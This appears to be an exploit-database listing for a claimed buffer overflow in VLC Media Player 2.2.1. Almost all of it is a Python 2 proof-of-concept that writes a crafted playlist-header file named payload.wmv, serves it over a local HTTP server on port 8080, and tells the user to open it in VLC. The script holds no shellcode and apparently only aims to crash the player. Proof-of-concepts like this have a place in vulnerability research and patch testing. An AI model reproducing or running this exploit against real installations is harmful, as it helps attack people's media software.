VLC Media Player 2.2.1 Buffer Overflow

Risk: High
Local: Yes
Remote: No
CWE: CWE-119

Exploit Title: VLC Media Player 2.2.1 Buffer Overflow 2016-09-28 Author: sultan albalawi Software Link: https://www.videolan.org/vlc/releases/2.2.1.html Tested on:win7 video :https://www.facebook.com/pentest3/videos/vb.100012552940568/189735791454851/?type=2&theater&notif_t=video_processed&notif_id=1475012468070044 ************************************************************************************* filecreate = "payload.wmv" # create file (payload.wmv) buffer = ("\x23\x45\x58\x54\x4d\x33\x55\r\n\x23"+ "\x45\x58\x54\x2d\x58\x2d\x53\x54\x52"+ "\x45\x41\x4d\x2d\x49\x4e\x46\x3a\x50"+ "\x52\x4f\x47\x52\x41\x4d\x2d\x49\x44"+ "\x3d\x31\x2c\x42\x41\x4e\x44\x57\x49"+ "\x44\x54\x48\x3d\x31\x2c\x52\x45\x53"+ "\x4f\x4c\x55\x54\x49\x4f\x4e\x3d\x31"+ "\x32\x30\x78\x33\x36\x30\r\n") buffer += filecreate open(filecreate, "wb").write(buffer) print "create file done {}".format(filecreate) import BaseHTTPServer import sys from SimpleHTTPServer import SimpleHTTPRequestHandler HandlerClass = SimpleHTTPRequestHandler ServerClass = BaseHTTPServer.HTTPServer Protocol = "HTTP/1.0" if sys.argv[1:]: port = int(sys.argv[1]) else: port =8080 server_address = ('',8080) HandlerClass.protocol_version = Protocol httpd = ServerClass(server_address, HandlerClass) sa = httpd.socket.getsockname() print sa[0],sa[1],filecreate print "open vlc and open file {}".format(filecreate) print "LISTENING..",sa[0],sa[1],filecreate httpd.serve_forever()

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